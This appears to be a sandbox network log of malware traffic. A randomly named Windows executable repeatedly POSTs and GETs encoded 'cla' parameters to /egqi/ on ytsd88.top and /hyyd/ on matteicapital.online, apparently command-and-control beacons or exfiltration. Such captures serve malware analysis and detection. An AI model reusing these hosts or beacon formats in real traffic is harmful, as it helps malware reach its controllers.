Session ID: 18  Source IP: 192.168.2.5  Source Port: 49924  Destination IP: 47.76.213.197  Destination Port: 80  PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp: Nov 22, 2024 07:56:33.447989941 CET  Bytes transferred: 618  Direction: OUT
POST /egqi/ HTTP/1.1
Host: www.ytsd88.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ytsd88.top
Cache-Control: max-age=0
Content-Length: 224
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ytsd88.top/egqi/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Raw: 63 6c 61 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 51 4b 4d 4b 54 6c 50 41 59 42 69 55 6c 6c 58 6a 42 6e 74 46 61 61 36 55 35 73 59 4c 78 70 46 33 42 65 41 32 44 32 51 41 74 30 64 6b 39 64 50 31 71 52 2f 6a 38 36 38 59 6c 5a 30 6c 7a 6e 57 35 2b 41 71 6c 7a 36 58 38 62 5a 66 6b 66 30 64 33 44 66 57 4c 43 38 4d 4a 32 79 6a 31 2b 42 57 67 53 71 44 39 72 64 5a 47 4d 4d 77 7a 78 74 57 52 77 72 50 79 30 7a 52 49 71 46 50 76 59 56 44 2f 6a 75 73 74 2b 4c 2b 42 55 48 47 46 49 6c 65 6a 59 30 7a 2f 32 33 67 70 31 39 66 68 33 69 69 55 59 30 52 47 36 42 35 65 74 46 2f 4a 76 59 64 77 70 68 75
Data Ascii: cla=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFIlejY0z/23gp19fh3iiUY0RG6B5etF/JvYdwphu

Timestamp: Nov 22, 2024 07:56:35.040144920 CET  Bytes transferred: 574  Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:56:34 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank">堡塔 ()</a></div></body></html>


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             19 | 192.168.2.5 | 49930 | 47.76.213.197 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 22, 2024 07:56:36.111277103 CET | 1635 | OUT | POST /egqi/ HTTP/1.1
                                                                                                            Host: www.ytsd88.top
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ytsd88.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ytsd88.top/egqi/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 54 71 4d 4b 46 35 50 42 37 5a 69 58 6c 6c 58 39 52 6e 73 46 61 62 34 55 39 34 69 4c 78 6c 56 33 48 43 41 32 6c 69 51 52 6f 41 64 71 39 64 50 39 4b 52 2b 37 63 36 54 59 6c 4a 4f 6c 79 4c 57 35 2b 41 71 6c 77 53 58 31 70 68 66 6f 2f 30 65 2f 6a 65 5a 64 43 39 52 4a 32 71 64 31 2b 46 6f 67 42 69 44 39 4c 4e 5a 57 76 6b 77 73 42 74 59 57 77 71 49 79 31 4f 52 49 73 68 70 76 5a 78 74 2f 68 2b 73 74 66 7a 67 52 58 62 43 54 75 31 52 6f 4c 6b 4e 68 32 72 53 68 6c 6c 51 68 47 4f 38 63 4e 4d 55 49 4e 52 54 57 4e 77 64 56 36 49 75 37 38 38 43 38 66 79 53 34 62 56 70 38 58 54 59 67 41 37 47 77 62 57 78 4c 54 70 2f 64 49 42 4a 33 45 39 39 4c 52 62 75 76 78 36 55 71 78 48 41 4c 39 38 4d 68 6b 50 46 4d 77 33 67 4c 51 42 43 6e 66 37 43 31 50 36 66 33 65 73 46 6d 44 31 32 63 36 44 59 79 59 4e 44 6e 4c 4a 49 5a 6b 6b 35 6c 50 2f 2b 59 43 48 47 45 41 66 57 4c 51 42 6c 73 6c 72 57 6b 6b [TRUNCATED]
                                                                                                            Data Ascii: cla=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 [TRUNCATED]
                                                                                                             Nov 22, 2024 07:56:37.679708958 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 409
                                                                                                            Connection: close
                                                                                                            ETag: "66d016cf-199"
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                            Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             20 | 192.168.2.5 | 49937 | 47.76.213.197 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 22, 2024 07:56:38.770698071 CET | 348 | OUT | GET /egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.ytsd88.top
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                             Nov 22, 2024 07:56:40.298732042 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:40 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 409
                                                                                                            Connection: close
                                                                                                            ETag: "66d016cf-199"
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                            Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             21 | 192.168.2.5 | 49956 | 208.91.197.27 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 22, 2024 07:56:46.216577053 CET | 628 | OUT | POST /hyyd/ HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.matteicapital.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.matteicapital.online/hyyd/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 56 55 49 64 6e 47 68 68 34 68 66 4f 56 51 50 49 48 71 63 6c 33 61 33 56 6b 70 30 30 44 47 32 66 6f 49 4b 50 58 54 4b 6f 72 66 72 6c 78 57 64 46 57 4e 4e 77 4f 56 50 73 6d 79 33 2b 51 6f 4c 51 2f 44 34 6c 31 58 69 37 35 69 6a 55 61 79 57 75 47 57 58 5a 4a 69 6a 41 34 36 54 43 50 68 6f 37 41 69 36 36 73 48 30 58 49 36 4b 78 49 35 38 63 52 2b 4f 47 65 69 78 34 78 71 64 58 55 2f 4c 2f 4c 5a 32 49 73 59 62 43 50 39 31 50 68 54 54 39 66 48 79 38 6d 31 33 6c 55 4a 7a 78 56 2b 72 72 44 46 34 49 74 76 39 55 58 63 4c 51 7a 2f 57 33 46 69 56 42 68 45 74 6c 35 63 30 3d
                                                                                                            Data Ascii: cla=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8m13lUJzxV+rrDF4Itv9UXcLQz/W3FiVBhEtl5c0=


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             22 | 192.168.2.5 | 49963 | 208.91.197.27 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 22, 2024 07:56:48.885040045 CET | 648 | OUT | POST /hyyd/ HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.matteicapital.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.matteicapital.online/hyyd/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 43 66 70 70 36 50 47 68 79 6f 6f 66 72 6c 36 32 64 45 59 74 4e 6e 4f 56 53 66 6d 7a 4c 2b 51 73 6a 51 2f 47 63 6c 31 6b 36 34 35 79 6a 57 4f 43 57 57 49 32 58 5a 4a 69 6a 41 34 35 75 58 50 68 77 37 42 53 4b 36 2b 57 31 6c 54 61 4b 79 50 35 38 63 47 75 4f 4b 65 69 77 76 78 70 59 79 55 35 50 2f 4c 5a 47 49 73 4a 62 42 47 39 31 46 2b 44 54 74 57 69 72 71 6b 30 54 43 64 5a 47 6b 4f 50 6e 73 43 7a 4a 69 33 4e 31 38 45 38 6e 6f 6a 73 65 41 55 53 30 6f 37 6e 39 56 6e 4c 6a 6b 71 34 55 45 41 4b 34 49 33 73 66 2f 39 33 49 69 55 48 50 46
                                                                                                            Data Ascii: cla=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E8nojseAUS0o7n9VnLjkq4UEAK4I3sf/93IiUHPF


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             23 | 192.168.2.5 | 49968 | 208.91.197.27 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 22, 2024 07:56:51.547869921 CET | 1665 | OUT | POST /hyyd/ HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.matteicapital.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.matteicapital.online/hyyd/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 36 66 70 66 6d 50 58 32 6d 6f 70 66 72 6c 33 57 64 4a 59 74 4d 6c 4f 56 4b 54 6d 7a 47 4a 51 75 62 51 2b 67 51 6c 69 6c 36 34 33 79 6a 57 4d 43 57 74 47 57 57 45 4a 69 7a 45 34 35 2b 58 50 68 77 37 42 55 6d 36 39 48 31 6c 55 71 4b 78 49 35 38 49 52 2b 4f 6d 65 69 70 61 78 6f 74 48 55 4b 48 2f 4c 35 57 49 76 2f 48 42 48 64 31 44 2f 44 53 79 57 69 75 30 6b 30 66 5a 64 5a 44 73 4f 49 72 73 50 31 41 70 74 76 41 71 52 65 7a 4c 70 38 47 58 41 6c 77 6a 35 55 31 63 37 59 7a 2b 72 70 38 34 49 66 41 6c 6b 50 69 64 76 68 63 54 5a 51 79 4c 74 49 6f 67 43 66 41 37 35 4b 5a 63 74 31 48 78 6a 76 7a 58 35 4f 74 54 71 4d 65 63 59 41 6c 50 69 35 42 32 67 73 46 77 66 2b 73 59 68 52 78 77 35 6a 33 6f 72 4a 30 67 31 66 55 66 74 52 73 2b 34 68 31 74 71 77 33 66 6f 58 5a 51 2f 68 57 72 58 75 72 41 74 52 49 42 62 7a 4a 49 7a 61 51 57 53 4b 70 44 35 37 4c 46 39 4d 6e 4e 68 5a 49 54 68 42 [TRUNCATED]
                                                                                                            Data Ascii: cla=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 [TRUNCATED]


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             24 | 192.168.2.5 | 49975 | 208.91.197.27 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 22, 2024 07:56:54.212625027 CET | 358 | OUT | GET /hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA== HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                             Nov 22, 2024 07:56:56.263345003 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 22 Nov 2024 06:56:55 GMT
                                                                                                            Server: Apache
                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                            Set-Cookie: vsid=911vr4798042154029200; expires=Wed, 21-Nov-2029 06:56:55 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CFf7J/wdm3keJ20jtKk/wukqgAPBs54m03qfiZN8qnYbgSfmFLDEoQkyGoMaxh12FVU0jNetik5CoimDDMy4Bg==
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Connection: close
                                                                                                            Data Raw: 39 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65
                                                                                                            Data Ascii: 9f08<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.ne
                                                                                                             Nov 22, 2024 07:56:56.263411999 CET | 1236 | IN | Data Raw: 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69
                                                                                                            Data Ascii: t"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" i
                                                                                                             Nov 22, 2024 07:56:56.263448000 CET | 1236 | IN | Data Raw: 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e
                                                                                                            Data Ascii: tion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languag
                                                                                                             Nov 22, 2024 07:56:56.263483047 CET | 401 | IN | Data Raw: 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75
                                                                                                            Data Ascii: guages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash
                                                                                                             Nov 22, 2024 07:56:56.308244944 CET | 1236 | IN | Data Raw: 73 74 72 28 30 2c 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 29 7d 72 65 74 75 72 6e 20 77 7d 76 61 72 20 6b 3d 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 68 29 3f 68 2e 63 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21
                                                                                                            Data Ascii: str(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpde
                                                                                                             Nov 22, 2024 07:56:56.308305025 CET | 1236 | IN | Data Raw: 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 76 61 72 20 6d 3d 22
                                                                                                            Data Ascii: "script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debug
                                                                                                             Nov 22, 2024 07:56:56.308360100 CET | 1236 | IN | Data Raw: 54 69 6d 65 6f 75 74 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 2c 31 30 2c 62 29 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b
                                                                                                            Data Ascii: Timeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;while(b!=""&&d<100){d++;while(b.substr(0,1)==" "){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.s
                                                                                                             Nov 22, 2024 07:56:56.308394909 CET | 1236 | IN | Data Raw: 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 67 70 70 2e 71 3d 5f 5f 67 70 70 2e 71 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 67 70 70 2e 71 7d 76 61 72 20 67 3d 61 5b 30 5d 3b 76 61
                                                                                                            Data Ascii: n(){var a=arguments;__gpp.q=__gpp.q||[];if(!a.length){return __gpp.q}var g=a[0];var f=a.length>1?a[1]:null;var e=a.length>2?a[2]:null;if(g==="ping"){return window.cmp_gpp_ping()}else{if(g==="addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId"
